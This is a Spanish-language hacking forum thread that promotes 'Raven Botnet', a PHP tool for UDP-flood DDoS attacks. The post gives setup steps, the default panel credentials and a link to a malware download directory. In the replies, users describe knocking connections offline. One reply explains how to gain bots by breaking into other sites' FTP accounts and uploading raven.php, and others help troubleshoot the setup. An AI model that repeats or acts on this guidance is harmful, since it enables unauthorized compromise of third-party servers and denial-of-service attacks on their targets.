La Raven Botnet es una sencilla herramienta para realizar ataques DDOS utilizando nada mas y nada menos que servidores zombies.
El ataque se basa en una inundacion de paquetes UDP enviados a puertos aleatorios que consumen la memoria al igual que el ancho de banda del objetivo.
El bot se encuentra programado en php y una vez extraida la tool, puede ser encontrado con el nombre de "raven.php".
El mismo debera ser alojado en el host que se desea utilizar para realizar el ataque.
Una vez montada (instrucciones en el video de abajo) nos loguearemos con los siguientes datos por defecto.
User: q3rv0
Pass: ravenbot
(http://i.imgur.com/wiW2QYs.png)
Al momento de agregar los bots en el panel, solo tendremos que respetar el siguiente formato.
http://www.host/path-bot
Ejmplo: http://www.host-hacked.com/bot/raven.php
sin olvidar el www.
(http://i.imgur.com/k8fGogK.png)
(http://i.imgur.com/tpxP5OC.png)
Posteriormente rellenar los campos que seran utilizados para enviar las instrucciones de ataque a nuestros bots (target, tiempo que durara el ataque medido en segundos).
Por ultimo le damos a ATTACK! y la botnet comenzara a hacer su trabajo.
La tool puede ser descargada desde aqui http://malwares.underc0de.org/?dir=Botnets/Raven%20Botnet/
http://www.youtube.com/watch?v=bI9BnheiaLI
Excelente [Q]3rv[0]!! Funciona de 10!
Espero ver mas versiones!
Muy bueno [Q]3rv[0]!!!!
Esta buena, el tema es que tiene varios bugs de CSRF y como siempre digo no estamos en foros de corte y confeccion, así que creo que hay que ser cuidadosos a la hora de programar, ya que cuando se compromete un sistema no siempre el hecho de no tener sqli es suficiente :P
siendo cortes , no me gusta , esta buena todo re lindo pero no tira ni una galletita al piso ,, hice 10 zombies y no tiraba ni una pc con 1 mega , fue frustrante jajaja falla como escopeta de feria americana..
No tienes permitido ver los links.
Registrarse o Entrar a mi cuenta
siendo cortes , no me gusta , esta buena todo re lindo pero no tira ni una galletita al piso ,, hice 10 zombies y no tiraba ni una pc con 1 mega , fue frustrante jajaja falla como escopeta de feria americana..
Vas a necesitar mas de 10 bots para bajar un server, lo probaste en local o usaste 10 servers zombies??
Cita de: [Q3rV[0] link=topic=16628.msg56811#msg56811 date=1367886421]
No tienes permitido ver los links.
Registrarse o Entrar a mi cuenta
siendo cortes , no me gusta , esta buena todo re lindo pero no tira ni una galletita al piso ,, hice 10 zombies y no tiraba ni una pc con 1 mega , fue frustrante jajaja falla como escopeta de feria americana..
Vas a necesitar mas de 10 bots para bajar un server, lo probaste en local o usaste 10 servers zombies??
A una pc de un mega, no hace falta mas que una shell, yo he tirado sitios con mucho menos que eso (10), el ataque mepa que no es eficiente.
La tool fue actualizada debido a problemas tecnicos :P disculpen los contratiempos, vuelvan a descargarla saludos!
:) ;D ;) como diria harakiri.. Tasaaaandoo
por que me da este error cuando intento logiarme
Parse error: parse error in C:\wamp\www\RavenBot\admin.php on line 161
No tienes permitido ver los links.
Registrarse o Entrar a mi cuenta
por que me da este error cuando intento logiarme
Parse error: parse error in C:\wamp\www\RavenBot\admin.php on line 161
tienes que subirle a un host -_-! por ejemplo nixiweb o 00webhost
errores , mas errores y mas errores ,
Parse error: syntax error, unexpected '}' in C:\xampp\htdocs\bot\admin.php on line 161
en el xampp para testiar
Fixeado por mi, pero el problema no dosea ni una galletita esto XD
Edit: No escribas en mayusculas gracias
Atte: Snifer
La botnet dossea ya la testee contra un par de servers!
Que buenisima tool, enhorabuena compañero!
-Saludos-
Cita de: [Q3rV[0] link=topic=16628.msg57214#msg57214 date=1368290742]
La botnet dossea ya la testee contra un par de servers!
No , no hace ddos , con 20 Zombies , tendria que tirar un host web basico , y no lo tira , probe con ddos a servers de Cs ; Argentum Online , tambien testee con un amigo si le dosseaba algo y no , tambien si te fijas el codigo tenes error de syntaxis , pusiste un `}` sin abrirlo , no se que quisiste hacer hay , despues tenes varias formas de entrar al panel de login sin utilizar la contraceña , pero bueno , buen trabajo igual.
Las llaves estan bien en caso de que hubiera cerrado una sin antes abrirla me hubiese dado error, y con el tema del bypass del panel te la mandaste los scripts estan bien protegidos por session asi que me gustaria que me muestres la manera de evadir la auth saludos!
Cita de: [Q3rV[0] link=topic=16628.msg57356#msg57356 date=1368452434]
Las llaves estan bien en caso de que hubiera cerrado una sin antes abrirla me hubiese dado error, y con el tema del bypass del panel te la mandaste los scripts estan bien protegidos por session asi que me gustaria que me muestres la manera de evadir la auth saludos!
No pude probar, pero tenes razón en lo de los bypass, a menos que tire algo re loco, porque eh tratado en la versión anterior y no pude saltearlo.
http://nairteamo.comoj.com/index.php
Metodo: GET
Input Name: passw
Si yo obtengo acceso a la caché del navegador del usuario, podría obtener fácilmente la información sensible
que se pueden guardar en texto plano
lo fixee de esta forma
Desactive el atributo autocomplete de campos de entrada que contienen datos sensibles
colocando autocomplete = "off" dentro de las etiquetas del campo de entrada
Out: Lo anduve scaneando por arriba , si le meto mas profundo calculo que tiene peores vulnerabilidades y posibilidades de bypassearlo
[/b]
http://underc0de.org/foro/malware/raven-botnet-(testing)/
FUNCIONANDO AL 100%
Buena TooL, gracias [Q]3rV[0] !!
No tienes permitido ver los links.
Registrarse o Entrar a mi cuenta
http://nairteamo.comoj.com/index.php
Metodo: GET
Input Name: passw
Si yo obtengo acceso a la caché del navegador del usuario, podría obtener fácilmente la información sensible
que se pueden guardar en texto plano
lo fixee de esta forma
Desactive el atributo autocomplete de campos de entrada que contienen datos sensibles
colocando autocomplete = "off" dentro de las etiquetas del campo de entrada
Out: Lo anduve scaneando por arriba , si le meto mas profundo calculo que tiene peores vulnerabilidades y posibilidades de bypassearlo
[/b]
WTF ? Es en serio? XD
Excelente! Descargada y Probando! :P
Buenisimo, tengo por ahi otros Codes, los cuales tambein funcionan con PHP Shells para inundar con paquedes.
Cuando los hare estare posteandolos. Saludos
Sigo sin entender una cosa, los zombies como se consiguen, subiendo el raven.php en servidores agenos?
si, asi es metadato. Se infecta con el raven.php
No tienes permitido ver los links.
Registrarse o Entrar a mi cuenta
si, asi es metadato. Se infecta con el raven.php
Pero tengo que subir el archivo a servidores que no sean mios o tengo que pasarle el link donde esta alojado el raven.php, por ejemplo pasarle a una victima http://mihost.com/raven.php ??
Podrias explicarlo un poco mas detallado, gracias
Saludos jefe
Seria asi..
Tu tienes tu server: www.miserver.com y ahi montas el cliente, que seria la parte en donde tienes el login y el panel para atacar.
Luego entras a los FTP de otros sitios, www.sitio1.com , www.sitio2.com etc... y les subes el raven.php
Luego vuelves a tu sitio y le pones las URL de los raven que has subido. Ejemplo: www.sitio1.com/raven.php , www.sitio2.com/raven.php ....
Eso es todo!
Saludos!
Hola una ultima consulta, ¿se podría atacar a un router satisfactoriamente, cuantos bots tendríamos que tener online (aproximadamente)?
Saludos!!
Depende del router si es vulnerable a un ataque por medio de alguna vulnerabilidad de hardware !
Regards,
Snifer
Link nuevo . No va :l
Está en la bd de malwares de underc0de
http://malwares.underc0de.org/?dir=Botnets/Raven%20Botnet/
Saludos!
ANTRAX
No tienes permitido ver los links.
Registrarse o Entrar a mi cuenta
Está en la bd de malwares de underc0de
http://malwares.underc0de.org/?dir=Botnets/Raven%20Botnet/
Saludos!
ANTRAX
Hola ! Mira configure todo de Hostinger lo subi al ftp y la sql a phpmyadmin y al entrar a ADMIN me se queda en pantalla blanca . Salu2
Comprobada la eficiencia de la tool ;)
No tienes permitido ver los links.
Registrarse o Entrar a mi cuenta
No tienes permitido ver los links.
Registrarse o Entrar a mi cuenta
Está en la bd de malwares de underc0de
http://malwares.underc0de.org/?dir=Botnets/Raven%20Botnet/
Saludos!
ANTRAX
Hola ! Mira configure todo de Hostinger lo subi al ftp y la sql a phpmyadmin y al entrar a ADMIN me se queda en pantalla blanca . Salu2
Estás seguro de que lo has configurado correctamente? xD
Un saludo.
El link para descargarlo no funciona :(
No tienes permitido ver los links.
Registrarse o Entrar a mi cuenta
El link para descargarlo no funciona :(
http://malwares.underc0de.com/?dir=Botnets/Raven%20Botnet/
Un saludo.
?¿¿¿¿¿¿¿¿¿¿¿¿¿?????
Warning: mysqli_connect() [function.mysqli-connect]: (HY000/2005): Unknown MySQL server host 'HOST' (-2) in /home/u114970250/public_html/config.php on line 10
Ocurrio un problema al intentar conectar a la DB Unknown MySQL server host 'HOST' (-2)
Revisa los datos de conexion a la base de datos. Tienen que estar mal
Saludos!
ANTRAX
Hola no me puedo descargar la tool como hago no me sirve el link
No tienes permitido ver los links.
Registrarse o Entrar a mi cuenta
Hola no me puedo descargar la tool como hago no me sirve el link
Lo tienes dos comentarios mas arriba..
http://malwares.underc0de.com/?dir=Botnets/Raven%20Botnet/
cual es la maldita pass? ay esta instalado y no me deja entrar cual es el US y el pass
No tienes permitido ver los links.
Registrarse o Entrar a mi cuenta
cual es la maldita pass? ay esta instalado y no me deja entrar cual es el US y el pass
CitarEl mismo debera ser alojado en el host que se desea utilizar para realizar el ataque.
Una vez montada (instrucciones en el video de abajo) nos loguearemos con los siguientes datos por defecto.
User:q3rv0
Pass:ravenbot
lee bien el post
Probé la herramienta y con 13 bot me tumbo una conexión de 2gb, pero hasta el momento ninguna página, mi duda es si es un Reaven.php es por host??? este ataque se llama shell booter y en tutoriales eh visto que puedes pones unas 10 shell (Reaven.php) por cada página hackeada.... será cosa de probar ;D
Si, es exactamente como lo mencionas. Tenes que subir el raven.php en distintos hosts para aprovechar la conexion de cada uno de ellos para atacar.
Saludos!
ANTRAX
mm Cuando intento atacar a mi IP para probar aver si funciona me sale esto: http://gyazo.com/90b2bfda5b6c3d8367e1e1575b0c704f y la ip del host no es la misma que la que pone en el wireshark, alguien me puede ayudar? Se lo agradeceria
Podria ser que la IP que andas observando no crees que es interna en tu red? y la IP que se observa en el panel de la reaven es una pública.
Regards,
Snifer